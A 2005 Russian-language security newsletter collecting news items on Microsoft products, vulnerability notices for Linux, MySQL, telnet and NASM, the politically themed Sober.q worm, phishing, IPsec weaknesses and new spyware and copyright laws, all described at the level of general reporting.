uinC NewsLetter #20, 2005


Приветствуем!

Новости из Security Мира

16/05/2005 09:43 Microsoft анонсировала окончательную версию ПО для поиска на компьютере
Компания Microsoft объявила о выпуске окончательной версии своего инструмента для поиска информации на компьютере, сообщает Reuters. Таким образом, она составит конкуренцию Google и Yahoo, уже выпустившим данный сервис. Также компания Apple ранее выпустила программу для поиска данных на Macintosh. MSN Search Toolbar был доступен в пробной версии пять месяцев назад. Программа позволяла искать электронные письма, документы и записи баз данных, сохраненных на жестком диске. Данный сервис будет более эффективен, чем функция «Найти» в Windows. Программа, доступная на сайте MSN, может распознавать около 200 типов файлов, в том числе Excel, PowerPoint, MP3, GIF и JPG. Доступ к файлам PDF будет возможен после закачки дополнительного ПО от Adobe.
Страница загрузки

16/05/2005 10:11 Microsoft добавила Wi-Fi-безопасность в Windows
Разработчики Microsoft добавили в патч Windows XP Service Pack 2 (SP2) новый модуль WPA2 (Wi-Fi Protected Access 2), обеспечивающий безопасность Wi-Fi-соединений по стандарту IEEE 802.11i. Обновленный патч поддерживает элемент WPS IE (wireless provisioning services information element), который позволяет провайдерам предоставлять услуги через защищенные и незащищенные хот-споты в единой сетевой инфраструктуре. Обновление уже доступно для бесплатной загрузки
CNews

16/05/2005 10:34 Уязвимость в cdrdao
Secunia сообщает о наличии уязвимости ПО для записи дисков в открытых системах cdrdao. Наличие уязвимости позволяет локальному пользователю повысить привилегии в системе. Однако, для этого необходимо наличии флага SUID у исполнимого файла cdrdao. Подробности уязвимости не сообщаются, однако на сайте производителя имеется обновлённая версия 1.2.0.
Обновление

16/05/2005 11:03 Правоохранительные органы Беларуси усиливают борьбу с хакерами
Виртуальные мошенники совсем не похожи на традиционных грабителей. Но интеллигентность и внешняя беззащитность – обманчива. Их интересует все, что может быть связано всемирной паутиной, и принесет им большие деньги. В интернете бесконечное множество шпаргалок и подсказок для хакера-новичка, но за его первыми преступными шагами следят правоохранительные органы. Одновременно сами компьютерные взломщики жестко борются с конкурентами. Не отстают от виртуальных преступников и охотники на хакеров. Управление по раскрытию преступлений в сфере высоких технологий постоянно наступает на пятки белорусским взломщикам. С начала года более чем за 150 преступных действий ими возбуждено 79 уголовных дел. Однако законодательство пока обходится мягко с гениями компьютерного взлома. Заместитель начальника управления «К» МВД Беларуси Михаил Старикович отметил, что, по сравнению с США, законодательство у нас мягкое, можно отделаться штрафом за серьезные преступления. Новые кадры для охоты на компьютерных преступников готовятся в ведущих российских и белорусских вузах. Там же самообразованием занимаются и будущие хакеры. Кстати, в Беларуси образовательная информация для виртуальных взломщиков не заблокирована. Смотри, учись! Но если захочется попробовать – автоматически становишься преступником.
Источник

16/05/2005 12:32 Работать с новой версией антивируса Kaspersky SMTP-Gateway 5.5 стало проще
"Лаборатория Касперского" начала продажи новой версии антивирусного программного комплекса Kaspersky SMTP-Gateway 5.5 для Linux/Unix. Система защиты предназначена для антивирусной обработки проходящего через нее SMTP-трафика. Помимо эффективной защиты от вредоносных программ, разработка "Лаборатории Касперского" объединяет в себе набор таких функций, как маршрутизация почтового трафика и защита от хакерских атак. Программа реализует полноценный почтовый маршрутизатор, работающий под управлением операционных систем Linux, FreeBSD или OpenBSD. Антивирусная безопасность проходящей через почтовый маршрутизатор электронной корреспонденции обеспечивается на многоуровневой основе: проверке на присутствие вирусов подвергаются тела сообщений и вложения, доступна дополнительная фильтрация по именам и MIME-типам вложенных файлов. В процессе антивирусной обработки писем система выявляет инфицированные, подозрительные, поврежденные и защищенные паролем вложенные файлы и тела сообщений. Отправители, адресаты этих сообщений и администратор могут получать от системы соответствующие уведомления. В частности, новая версия позволяет администратору дополнять такое уведомление расширенной справочной информацией (статус проверки, версия программы, дата обновления антивирусных баз и т.д.). Кроме того, администратор может добавлять в обработанные почтовые сообщения сформированный по шаблону текст, который может изменяться для отдельных групп адресатов. Изменен и механизм антивирусной обработки почтового трафика - в Kaspersky SMTP-Gateway 5.5 была внедрена система управления рабочей очередью ожидающих проверки объектов. Теперь администратору доступны такие операции, как просмотр очереди, удаление сообщений из очереди, а также проверка и отправка определенного сообщения вне общей очереди. Можно и ограничивать размер рабочей очереди приложения.
Подробности

16/05/2005 12:50 Проект сетевого уровня идентификации
В Microsoft разработали модель распределенной инфраструктуры сетевой идентификации - Identity Metasystem и подготовили ее тестовую реализацию. Назначение инфраструктуры - обеспечить возможность объединения (федерирования) систем идентификации, в том числе через Internet, независимо от используемых в них технологий, в числе которых могут быть Kerberos, X.509 и SAML. Metasystem представляет собой сетевой слой, по которому предполагается передавать весь трафик идентификации независимо от протокола или формата. Когда идентификационные данные достигают своего назначения, программный транслятор преобразует их в формат, необходимый для доступа к нужному ресурсу. Metasystem определяет требования к способам описания учетной записи, организации сеанса обмена данными, установки доверительных отношений между сетевыми узлами и интеграции различных форматов маркеров, предусмотренных тремя вышеперечисленными технологиями. В Microsoft обещают, что подключать к Metasystem произвольные инфраструктуры управления доступом и корпоративные приложения можно будет без их предварительной модификации. Реализация инфраструктуры, созданная в корпорации, полагается на WS-Trust и другие протоколы Web-сервисов, разработанные Microsoft совместно с IBM. В связи с этим некоторые специалисты высказывают мнение, что инициатива Microsoft не получит хода до тех пор, пока данные протоколы не будут переданы на утверждение какой-либо организации по стандартизации.
"Открытые системы"

16/05/2005 13:23 F-Secure: у Toyota "иммунитет" к мобильным вирусам
Транспортные средства-зомби пока являются научной фантастикой, утверждают исследователи финской фирмы F-Secure. Специалисты F-Secure провели тестирование, в ходе которого безуспешно пытались заразить навигационную систему Toyota Prius вариантами вируса Cabir и другими вирусами через Bluetooth. Испытания были проведены после появления сообщений о том, что некоторые модели Lexus и Landcruiser, особенно LX470 и LS430, уязвимы для вирусов, заражающих мобильники через Bluetooth. В частности, такое сообщение поступило от «Лаборатории Касперского». В нем говорилось, что мобильные вирусы могут заражать GPS-систему автомобиля, соединенную с мобильником через Bluetooth. Представители Toyota заявили, что их автомобили не подвержены действию этих вирусов, поскольку уязвимая операционная система Symbian в них не используется, сообщил CCRC.
CNews

17/05/2005 09:19 Microsoft решила объединить все компьютерные проблемы в одну систему
Компания Microsoft анонсировала новый инструмент, призванный универсальным образом заботиться о безопасности пользовательских компьютеров под управлением семейства ОС Windows без необходимости разделять задачи по установке "заплаток", проверок на наличие вирусов, "шпионских программ" (spyware), выявлению и решению других проблем. Компания намерена в течение года ввести сервис Windows OneCare, который бы комплексно решал все эти задачи. Кроме обновления системы, поиска вирусов, "троянов" и "шпионов" сервис предполагает проверку уровня сетевой защищенности (настройку файрвола), а также обслуживание жесткого диска - дефрагментацию и проверку поврежденных файлов, кроме того, будет реализована система резервирования самых необходимых данных. Планируется, что сервис будет реализован в виде автоматической программной услуги, доступной по подписке через Интернет с сайта Microsoft. Кроме того, как заявляется, подписчики получат возможность телефонной консультации со специалистом, стоимость которой будет входить в стоимость подписки. Как известно, ранее Microsoft не работала на рынке ПО для компьютерной безопасности, выйдя туда лишь осенью прошлого года, что сопровождалось покупкой нескольких небольших производителей "защитного" ПО. Традиционно вопросы безопасности решала лишь система обновления Windows Update, через которую пользователи обновляли ОС при обнаружении в них критических уязвимостей. Однако несколько месяцев назад были представлены бета-версии особых модулей для поиска и устранения "вредоносных" и шпионских программ. Вместе с тем, с объявлением о Windows OneCare компания впервые объявила о намерении предоставлять антивирусное решение - сейчас основные антивирусные программы на рынке предлагаются сторонними производителями.
Lenta.Ru

17/05/2005 09:36 Intel не считает уязвимость в HT серьёзной.
Как мы сообщали ранее, студент Колин Персиваль из Ванкувера сообщил об уязвимости в технологии HT (HyperThreading), применяемой в семействе процессоров Pentium 4 (ускорение исполнения программ путем одновременного выполнения двух потоков в одном и том же процессоре). Метод, изложенный в пятницу на конференции BDSCan в Оттаве, опирается на шпионский процесс, внедренный в сервер и разделяющий кэш L2 с криптографическим процессом OpenSSL. Шпионский процесс измеряет время, занимаемое определенными операциями с кэш-памятью, и устанавливает род деятельности другого процесса, собирая информацию (Персиваль называет это «следами, оставленными в кэше», также подобный тип атаки называется Software timing attack) , которая помогает взломать нужные пароли. Intel, поставленная в известность об этой проблеме в марте, считает риск очень низким. Метод работает только на сервере, который злоумышленник уже взломал, установив в нем шпионский процесс. Раз хакеру это удалось, он может похитить данные гораздо легче и быстрее, сказал представитель Intel Говард Хай. Intel отмечает, что данный метод может работать и с другими процессорами, разделяющими ресурсы, а не только с процессорами Intel и технологией Hyperthreading. Между тем компания выражает надежду, что в новых версиях операционных систем Microsoft Windows и Linux эта проблема будет решена. Как пишет сам Персиваль, Линус Торвальдс в обсуждении уязвимости высказал мнение, что он тут не видит большой проблемы (правда, сам Колин пишет, что Линус не является экспертом по компьютерной безопасности). С октября 2004 года, когда Персиваль обнаружил эту лазейку, он работает с FreeBSD и другими разработчиками операционных систем над оценкой рисков, и на его сайте есть обсуждение этой темы. Операционные системы, не использующие гиперпоточность и запрещающие эту технологию, такие как SCO UnixWare, похоже, нечувствительны к данной уязвимости.
Подробности
Сайт Персиваля

17/05/2005 10:15 В Internet Explorer 7 появятся "табы"
Разработчики Internet Explorer объявили, что в седьмой версии появятся так называемые "табы". Табы - это интерфейсный элемент, позволяющий открывать несколько веб-страниц в одном окне браузера. В других браузерах табы используются уже довольно давно. В Opera издавна использовались многодокументные окна (MDI) . Табы в их современной форме популяризовал браузер Mozilla, а затем Firefox. Постепенно этот элемент интерфейса просочился и в другие аналогичные продукты, включая многочисленные браузеры на базе движка Internet Explorer, Opera и Safari (браузер для Mac OS X). Единственным современным браузером (хотя и самым распространённым из всех) остаётся Internet Explorer. В Microsoft считали, что пользователи запутаются, если в браузере табы будут, а в других программах (например, в "Проводнике" Windows или в Windows Media Player) - нет. "Возможно, мы сначала приняли неверное решение, а теперь принимаем правильное", - пишут разработчики в официальном блоге Internet Explorer. В ближайшем будущем ожидается бета-релиз IE7 - лишь "пробный камень" с целью проверить, как скажется изменение интерфейса на совместимости IE и многочисленных плагинов и надстроек к нему.
Подробности

17/05/2005 10:41 Уязвимость в ядре Linux
Сообщается, что устройства Linux kernel и pktcdvd ioctl обработчика подвержены уязвимостям, приводящим к нарушениям в работе локальной памяти. Проблема вызвана отсутствием проверки значений аргументов, передаваемых функциям 'raw_ioctl()' и 'pkt_ioctl()'. Таким образом, локальный злоумышленник может выполнять произвольный код в контексте системного ядра (ring-0). Уязвимость обнаружена в версиях 2.6 до 2.6.12-rc4.
Код эксплоита

17/05/2005 11:04 Новый червь Sober имеет политическую окраску
«Лаборатория Касперского» сообщает об обнаружении нового опасного интернет-червя Sober.q. Вредоносная программа распространяется при помощи предшествующей версии червя, Sober.p, содержащей функцию загрузки файлов с нескольких интернет-сайтов. Таким образом, новый червь поражает лишь те компьютеры, которые уже заражены Sober.p. Sober.q представляет собой модификацию исходного кода почтового червя Email-Worm.Win32.Sober, однако не содержит функции распространения своего тела в виде вложенных в письма файлов. Вместо этого программа рассылает по электронной почте различные тексты и ссылки радикально-политического характера. Будучи запущенным и активизированным на атакуемом компьютере своим предшественником, Sober.q копирует себя в системный каталог Windows и регистрируется в ключе автозапуска системного реестра и в ключе, отвечающем за запуск исполняемых файлов. Таким образом, червь получает управление при каждом запуске любого исполняемого файла в зараженной системе. Помимо этого, он создает несколько вспомогательных файлов с разными именами в системном каталоге Windows. Затем Sober.q сканирует файловую систему пораженного компьютера и записывает в специальные файлы все найденные адреса электронной почты, за исключением принадлежащих крупным разработчикам антивирусного и прочих видов программного обеспечения. Далее вредоносная программа производит ряд действий, не вписывающихся в стандартный алгоритм действий червей семейства Sober. Вирус создает файл под названием %system%Spammer.ReadMe и следующим текстом на немецком языке: Ich bin immer noch kein Spammer! Aber sollte vielleicht einer werden :) In diesem Sinne. (Я пока еще не спамер! Однако один, вероятно, должен был быть им :) В этом смысле). Затем вредоносная программа рассылает по всем найденным адресам, относящимся к доменным зонам de, ch, at, li и gmx письма с текстами радикально-политического толка на немецком языке, отправляя по всем прочим адресам англоязычные послания. В теле червя содержится несколько десятков различных вариантов текстов для рассылок такого рода. Наконец, аналогично предыдущим вариантам червя, Sober.q путем обращения к нескольким NTP-серверам регулярно проверяет системное время. В случае, если дата соответствует 11 мая 2005 года либо является более поздней, вредоносная программа пытается загрузить произвольные файлы с нескольких интернет-ресурсов. Также Sober.q пытается обнаружить в памяти и прекратить работу приложений, содержащих в названии следующие строки: fxsob, gcas, gcip, giantanti, hijack, inetupd, microsoftanti, nod32kui, nod32, sober, s-t-i-n-g.
Источник

17/05/2005 11:36 Клиенты банков пострадали от новой фишинговой схемы
Фишинговые атаки стали более эффективными, считают специалисты по безопасности. Произошло это благодаря персонификации: теперь для того, чтобы выманить у жертвы секретные данные о кредитной карте, мошенники используют реальную информацию о владельце счета. По сообщениям экспертов, от новой технологии фишинга уже пострадали клиенты многих крупных финансовых структур. Раньше письма мошенников в основном содержали информацию о банке, его сотрудниках и ссылку на специальный сайт, который был полностью идентичен порталу финансовой организации и контролировался злоумышленниками. Сейчас же на смену такому грубому способу приходят более эффективные персонифицированные атаки. То есть якобы банковские письма содержат теперь не только информацию о банке, но и личные данные клиента. Среди этих данных обычно встречаются номер счета, имя клиента и адрес его электронной почты. Сообщения рассылаются от имени банков якобы для подтверждения информации о счете: личного иден¬тификационного но¬мера или кода кредитной карты (ряд цифр, напечатанных с обратной стороны). Для большей убедительности в электронном сообщении используются логотипы банка, имена и фами¬лии реальных руководителей организации. Затем все происходит по давно отлаженной схеме: жертве предлагается зайти на идентичный банковскому сайт и "подтвердить" информацию о счете. Необходимость таких действий мошенники объясняют выходом из строя ПО банка или атакой хакеров. Специалисты американской компании Cyota, разработчика ПО для платежных систем, назвали персонифицированные фишинговые письма очень эффективным средством по выманиванию конфиденциальной информации о картах. Наличие в "банковском сообщении" личных данных существенно поднимает уровень доверия жертвы. Представители Cyota заявили также, что уже сейчас от новой фишинговой схемы пострадали многие клиенты известных и уважаемых финансовых структур. Их названия, правда, упомянуты не были. Новый вид атаки обещает быть более продуктивным, нежели обычные фишинговые письма. Неподготовленному человеку крайне трудно отличить мошеннические сообщения с личной информацией от обыкновенных банковских запросов.
Источник

17/05/2005 12:09 Пользователи VPN оказались под угрозой
Пользователи виртуальных частных сетей (VPN) рискуют стать жертвами хакерских атак. Для того чтобы перехватить данные, которыми обмениваются клиенты VPN, злоумышленникам достаточно будет приложить «незначительные усилия». С таким предупреждением выступили специалисты британского Центра по координации безопасности национальной инфраструктуры (NISCC), сообщает сайт News.com. Представители NISCC оценивают степень обнаруженной уязвимости как высокую. Она позволяет хакерам перехватывать пакеты данных, которые проходят между двумя устройствами, использующими протокол защиты IPsec. Кроме того, злоумышленники получают возможность модифицировать подпротокол, который шифрует передаваемые данные. В результате этого данные могут оказаться открытыми для посторонних. «Тщательно модифицировав отдельные части исходящего пакета данных, хакер может вносить контролируемые изменения во внутренний (зашифрованный) пакет... Если эти пакеты будут перехвачены, данные будут открыты посторонним лицам», — предупреждает NISCC на своем сайте. Виртуальная частная сеть позволяет пользователям удаленно работать в домашних или корпоративных сетях. Подключение к нужной сети происходит с помощью клиентской программы VPN, а обмен данными идет в интернет через специальный туннельный протокол. Для защиты VPN используется протокол IPsec, в состав которого входят средства шифрования.
VirusList

17/05/2005 13:24 Вышел WM Keeper Classic 2.4.0.1
WebMoney Transfer опубликовала новую версию клиентского программного обеспечения WM Keeper Classic 2.4.0.1, сообщает "Вебпланета". Начиная с версии 2.4.0.1 ключи доступа к WM-идентификатору клиента сохраняются в устройство-зависимом формате, обеспечивающим высокий уровень защиты данных от несанкционированного использования. Для управления WM-идентификатором с другого компьютера WM Keeper Classic 2.4.0.1 необходимо сделать резервную копию ключей и затем с ее помощью восстановить ключи на новом компьютере. Реализованный в новой версии мастер создания резервной копии ключей доступен в диалоге настроек безопасности программы.
Сайт WebMoney

18/05/2005 10:01 Небезопасное создание временных файлов в MySQL
В MySQL обнаружена уязвимость, позволяющая атакующему получить неавторизованный доступ к базе данных или повышенные привилегии. Проблема вызвана ошибкой проектирования скрипта 'mysql_install_db' при создании временных файлов. Уязвимости подвержены MySQL AB MySQL 4.0.0-4.0.11 и MySQL AB MySQL 5.0 .0-alpha - 5.0.4.
Подробности

18/05/2005 10:10 Многочисленные проблемы с Telnet в OpenServer
Переполнение буфера в функции slc_add_reply многочисленных telnet клиентов (на базе BSD) при хранении LINEMODE-опций позволяет атакующему выполнять произвольный код через ответы с большим количеством SLC-команд. В то же время, переполнение буфера в функции env_opt_add файла telnet.c позволит выполнение произвольного кода через запросы, содержащие огромное количество символов. Уязвимые версии:системные бинарники в OpenServer 5.0.6 /usr/bin/telnet и OpenServer 5.0.7 /usr/bin/telnet.
Подробности

18/05/2005 10:42 Office 12 облегчит связь
Признавая, что характер работы людей изменился, Microsoft сделает в будущей версии Office усиленный акцент на коллективную работу. Как сообщил в понедельник на конференции Gartner Symposium/ITxpo в Сан-Франциско директор по стратегии технологических платформ Microsoft Билл Хилф, софтверному гиганту помогает в этом компания Groove Networks, возглавляемая Реем Оззи и которую Microsoft приобрела в этом году. Одним из первых шагов в процессе коллективной работы является поиск доступных коллег. В этой связи Microsoft планирует расширить свою текущую работу над корпоративной системой IM (instant messaging) и добавить поддержку интернет-телефонии. Возможность управления технологией Voice over Internet Protocol — «одна из главных особенностей будущей версии Office», сказал Хилф. Компания планирует также продолжать дополнение семейства Office новыми серверными продуктами. Office 12, следующая версия флагманского ПО делопроизводства Microsoft, выйдет в будущем году. Однако пока компания мало что рассказала о том, что в нее войдет. В частности, она сообщила о планах существенного расширения использования XML в качестве средства обмена данными. Одна из причин, по которым Microsoft смотрит в сторону новых серверных продуктов, это тот факт, что многие компании используют Office для решения гораздо более широкого круга задач, чем обычные задачи делопроизводства, для которых продукт предназначался изначально.
ZDNet

18/05/2005 11:23 cAos Linux - альтернатива Fedore Core
cAos Foundation и команда разрабочтиков cAos Linux анонсировали публичный релиз cAos Linux версии 2, сообщает linux.org.ru. Предполагается, что этот дистрибутив будет альтернативой Fedore Core, с более длинным сроком поддержки(3-5 лет) и развитым community.
Сайт проекта

18/05/2005 11:49 Конфликт вокруг Java в OpenOffice временно улажен
Конфликт, разгоревшийся между разработчиками открытого пакета офисного программного обеспечения OpenOffice и Фондом свободного ПО (Free Software Foundation - FSF) в связи с подготовкой к выходу второй версии OpenOffice, кажется, пришёл к некоему промежуточному разрешению. Причиной споров стало обширное использование языка Java для усовершенствования функционала OpenOffice. Это обстоятельство, в основе которого лежат сугубо практические причины, вызвало, однако, споры идеологического толка. В дело вмешался Ричард Столлмен, глава FSF и главный пропагандист открытого ПО. Столлмен сделал заявление, в котором прозвучал термин "Java-ловушка" (Java Trap). Суть ловушки, по Столлмену, состоит в том, что использование "закрытых" версий Java для реализации определённых функций в открытом программном пакете могло привести к тому, что разработчики коммерческих версий Java, в первую очередь, Sun Microsystems, могут заявить свои права на OpenOffice. Учитывая, что у истоков сообщества OpenOffice.org стоит как раз Sun Microsystems, и компания эта, согласно Newsforge (и общеизвестным фактам), славится своим непоследовательным отношением к открытому ПО и открытым лицензиям. Вдобавок, в сущности, многие участники проекта OpenOffice.org являются работниками Sun, поэтому Столлмен и его соратники заняли жесткую позицию неслучайно. Столлмен и вовсе предложил написать версию OpenOffice, в которой Java отсутствовала бы полностью. В ответ редактор раздела eWeek Linux & Open Source Стивен Воэн-Николс опубликовал статью, в которой предсказывал появление "развилки" - двух раздельных версий OpenOffice, с Java и без.
Более подробно

18/05/2005 12:03 Уязвимость в NASM
Jindrich Novy cообщил об обнаружении уязвимости в NASM - Netwide Assembler, применяемом во многих открытых системах для компиляции файлов на языке Ассемблер. Уязвимость связана с некорректными проверками условий в функции "ieee_putascii()" файла outieee.c (функция vsprintf), что позволяет вызвать переполнение буфера при ассемблировании специальным образом сформированного файла и, в дальнейшем, выполнить произвольный код с привилегиями пользователя, от имени которого запущена программа. Уязвимости подвержены версии 0.98.38 и 0.98.39. В качестве временной меры предосторожности рекомендуется не ассемблировать файлы из сомнительных источников. Автором выпущен патч.
Подробности

18/05/2005 12:24 Неонацисты проникли в миллионы ПК
Спам все шире используется не только в коммерческих целях, но и для пропаганды экстремальных, экстравагантных, а то и фашистских взглядов, а также в политической борьбе вообще. Это в очередной раз доказали неонацисты. Новый червь разослал в минувшие выходные праворадикальные призывы немецко-фашистского толка на миллионы компьютеров. По мнению экспертов в области компьютерной безопасности, этот факт свидетельствует о том, что спам становится орудием не только мошенников, но и пропагандистов радикальных идей. «Мы наблюдаем тенденцию, в рамках которой авторы червей во все большей степени используют спам не для «впаривания» товаров, но как средство политической пропаганды, - заявил Скотт Чейзин (Scott Chasin), ведущий специалист по технологиям антивирусной компании MX Logic. Chasin и другие эксперты указывают, что сообщения рассылались компьютерами, зараженными новым вариантом червя Sober и превратившимися в платформ для осуществления атак. Объем спама, генерируемого таким образом, оценивается экспертами как «ошеломляющий». «Нас буквально завалило сообщениями от подвергшихся атакам небольших сетей», - заявил Скотт Фендли (Scott Fendley), сотрудник компании Internet Storm Center – службы, отслеживающей онлайновые угрозы. Как сообщает Reuters, в строке «тема» рассылаемых червем сообщений содержится текст на немецком языке, гласящий: «мультикультура = мультикриминал». Само сообщение содержит ссылки на немецкие сайты расистского толка, а также новостные сообщения, отражающие точку зрения противников иммиграции и иммигрантов.
CNews

18/05/2005 12:57 Наглядное представление концепции технологий Java
На официальном сайте SUN Microsystems размещена презентация концепции технологий Java, сообщает opennet.ru. Данные представлены в виде Flash-компонента, а так же PDF файла содержащего довольно емкий по размерам документ. В документе наглядно показаны основные технологии Java, их краткое описание и обозначены взаимосвязи. Наименования некоторых технологий содержат ссылки на официальные страницы проектов. Во Flash-компоненте есть так же алфавитный указатель по технологиям. Презентация ориентирована в первую очередь на новичков, но также будет полезна и опытным разработчикам. Распечатанная при 100% масштабировании презентация имеет размер 40.5 на 30.5 дюймов, и будет очень наглядно смотреться в виде плаката на стене.
Презентация

18/05/2005 14:28 Китай нашел управу на любителей пиратской музыки и видео
С 30 мая в Китае вступает в силу закон, который защищает авторское право в Интернете, сообщает информационное агентство "Синьхуа". Документ был создан совместными усилиями Национального управления по авторскому праву и Министерства информационных технологий. Закон распространяется на сайты, на которых загружается, хранится и скачивается текстовая, аудио и видеоинформация. По новым правилам, если владелец авторских прав заметит, что интернет-сайт использует принадлежающую ему интеллектуальную собственность, то он вправе потребовать от интернет-провайдера убрать копипаст. Закон предусматривает также наказание за нарушение авторских прав. Если провайдер никак не отреагировал на сообщение о нарушении интеллектуальной собственности, то сумма, полученная от ее использования, будет конфискована. Кроме того, нарушителю придется заплатить штраф, который в три раза превысит нелегальный доход. Если размер незаконно нажитого оценить невозможно, то на "пирата" будет налагаться максимальный штраф в размере 100 тысяч юаней (12 тысяч долларов). Закон также предусматривает, что самые серьезные дела, а также дела, связанные с криминалом, будут разбираться в судах.
Подробности

18/05/2005 15:35 В штате Вашингтон принят суровый закон против шпионского ПО
Губернатор штата Вашингтон подписал закон "О шпионском программном обеспечении" (On Regulating Spyware). Закон отличается широким толкованием понятия Spyware и весьма строгими мерами наказания за допущенные нарушения. В частности, закон запрещает "обманным способом" изменение стартовой страницы браузера, перенастройку установленного по умолчанию прокси-сервера или подмену провайдера (речь идёт, очевидно, о "дайлерах", встречающихся на сайтах "для взрослых") и изменение списка закладок в браузере. Запрещено удалённо менять настройки подключения в интернет без ведома пользователей. Естественно, запрещён сбор личной информации "преднамеренно обманными способами" и передача их другим лицам, в том числе, использование троянов и клавиатурных "жучков". К числу незаконных деяний также отнесено и обманное препятствование попыткам пользователя деинсталлировать или дезактивировать программное обеспечение (т.е. программы, которые без вашего ведома снова устанавливаются на компьютер и активируются снова, этим законом однозначно запрещены). Запрещено и обманное уведомление о том, что та или иная программа дезактивирована, если при этом она продолжает работать. Выведение из строя средств защиты - антивирусов, брандмауэеров и антишпионских программ - также запрещается. Тут невольно вспоминается то обстоятельство, что за принятие этого закона активно ратует компания Microsoft, занимающаяся, в частности, разработкой антишпионских программ в силу бешеного разгула spyware, пришедшегося на 2004 год. Обращает на себя внимание и то, что в штате Вашингтон отныне запрещено "открытие многочисленных, последовательных, отдельных рекламных страниц в браузере владельца или оператора компьютера без его, оператора или владельца разрешения, так, что их невозможно закрыть, не выключая компьютер или закрывая браузер".
"Компьюлента"

19/05/2005 09:15 За 5 лет мировой уровень компьютерного пиратства возрастет в два раза
Через пять лет количество используемого контрафактного ПО в мире может составить до двух третей от всего объема ПО по сравнению с одной третью в настоящий момент. Об этом, как передает Reuters, свидетельствуют данные исследования Международной информационной корпорации (IDC) и Альянса коммерческого ПО (BSA). В пятилетний срок расходы на легальные программы, по оценкам исследователей, приблизятся к 300 миллиардам, а на нелицензионные - к 200 миллиардам. Подобный прогноз объясняется стремительным распространением в мире Интернета, с помощью которого стало как никогда просто передавать на расстоянии украденную лицензионную цифровую продукцию. Отмечается, что более половины украденных и распространенных по всему миру программ произведены в странах Евросоюза, США и Канаде. По данным иссдедования, в 2004 году в 87 странах мира было произведено программ на 59 миллиардов долларов, а фактически установлено - на 90 миллиардов. Коэффициент пиратства в Европе, Африке и на Ближнем Востоке за прошлый год упал на 2 процента и составил 39 процентов, в то время как стоимость пиратских программ выросла с 3 до 15,7 миллиардов.
Lenta.Ru

19/05/2005 09:45 Netscape выпускает браузер с защитой от фишинга
Ожидается, что в четверг Netscape выпустит финальную версию Netscape 8 — веб-браузера, защищающего пользователей от таких онлайновых надувательств, как фишинг. Альфа- и бета-версии нового браузера доступны с февраля. Netscape обещает, что финальная версия, как и предыдущие, будет включать средства усиленной защиты системы в процессе веб-браузинга. Кроме того, у Netscape 8 более наглядный интерфейс, хотя существенных отличий от бета-версии, выпущенной в марте, в нем нет. Представитель Netscape, отделения компании America Online, принадлежащей медиагиганту Time Warner, отказался подтвердить план выпуска браузера в четверг, так что он еще может быть отложен. Этим выпуском Netscape бросает вызов доминирующему браузеру Microsoft Internet Explorer, у которого было много проблем с уязвимостью, и надеется воспользоваться успехом Firefox, браузера с открытым исходным кодом, который вышел в ноябре и был загружен уже 57 млн раз. Последняя бета-версия браузера Netscape 8 автоматически устанавливает параметры защиты, пользуясь списком известных веб-сайтов злоумышленников, тем самым оберегая пользователей от происков фишеров. Netscape обещает, что черный список веб-сайтов, подозреваемых в хостинге шпионского ПО или использовании схем фишинга, будет регулярно обновляться. При посещении какого-нибудь веб-сайта на панели браузера будет зажигаться красный или зеленый сигнал — в зависимости от того, считается ли этот сайт опасным или безопасным.
ZDNet

19/05/2005 10:28 Microsoft предложит карточку покупателя под Windows
В ближайшее время Microsoft представит раннюю версию новой программы для Windows, цель которой — помочь заказчикам в борьбе с изобилием интернет-логинов. К концу мая софтверный гигант планирует выпустить версию technical preview приложения с кодовым названием InfoCard. По словам Майка Нэша, топ-менеджера Microsoft, ответственного за ПО защиты, она будет содержать и другие технологии, нацеленные на то, чтобы облегчить и обезопасить использование цифровых удостоверений личности. Этот выпуск предназначен для разработчиков, которые должны будут делиться с Microsoft своими впечатлениями. Кроме InfoCard, компания планирует выпустить предварительные версии технологий, которые позволят различным системам идентификации, используемым в интернете, взаимодействовать друг с другом. «Изобилие разных систем идентификации — одна из серьезных проблем, с которыми люди сталкиваются ежедневно», — говорит архитектор группы распределенных систем Microsoft Джон Шевчук. На прошлой неделе Microsoft и Sun Microsystems продемонстрировали также ПО «единой точки входа», позволяющее, однажды зарегистрировавшись, пользоваться сетевыми сервисами, которые прежде требовали отдельных процессов аутентификации. InfoCard станет наиболее зримым проектом Microsoft для пользователей ПК. Это будет хранилище идентификационных данных, принимаемых такими онлайновыми службами, как веб-магазины.
Подробности

19/05/2005 11:00 Госсекреты США утекают через Wi-Fi-сети
Лишь немногие из правительственных организаций США, внедрившие Wi-Fi сети, позаботились об их безопасности, — утверждается в докладе Контрольно-счетной палаты США (Government Accountability Office, GAO), представленном Конгрессу. Из 24 крупнейших правительственных агентств 9 не имеют планов по обеспечению защиты Wi-Fi сетей. В 13 агентствах не установлена защита, а большинство агентств не отслеживают происходящее в своих беспроводных сетях. В процессе проверки сотрудники GAO принимали Wi-Fi сигналы за пределами офисов 6 агентств, другими словами, могли осуществить несанкционированный доступ. В одном из агентств 90 ноутбуков были настроены на автоматический поиск сигнала в эфире, что может привести к нахождению подставного сервера. В докладе не сообщается, какие именно агентства пренебрегают безопасностью. Национальный институт стандартов и технологий потребовал от государственных организаций сначала определиться с безопасностью, а лишь затем «освобождать» свои сети от проводов. Следует удостовериться в том, что правительственные агентства используют шифрование, виртуальные частные сети и другие инструменты защиты, — говорится в докладе. Кроме того, необходим мониторинг внутренних сетей на предмет обнаружения нелегальной активности, а также обучение персонала безопасной работе, сообщает Reuters.
CNews

19/05/2005 11:16 Внутренние атаки вызваны желанием отомстить
Сотрудники компаний и организаций, которые наносят вред экономике и безопасности США посредством компьютеров, как правило, руководствуются желанием отомстить работодателю. К такому выводу пришли специалисты Секретной службы Министерства финансов США и координационного центра CERT при университете Карнеги-Меллона, сообщает Associated Press. В ходе исследования, заказанного Министерством внутренней безопасности США, эксперты изучили десятки случаев компьютерного саботажа, произошедших в течение 6 последних лет. Исследование должно было объяснить, что заставляет проверенных сотрудников атаковать IT-структуры и установить, как сильно эти атаки влияют на работу компаний. В большинстве случаев организаторы атак оказались недовольными действующими или бывшими сотрудниками технологических департаментов. Среди способов мести оказывалось удаление важных программ и данных, размещение порноматериалов на сайте работодателя и выведение из строя целых сетей. Значительная часть злоумышленников демонстрировала перед нападением характерные признаки: прогулы, опоздания, споры с коллегами и вульгарное поведение. Почти все «мстители» предпринимали шаги, чтобы скрыть свои идентификационные данные в онлайне, и иногда даже выдавали себя за своих коллег. В числе злоумышленников оказывались люди всех возрастов: от подростков до пенсионеров.
Подробности

19/05/2005 11:50 Nokia выпускает исправления
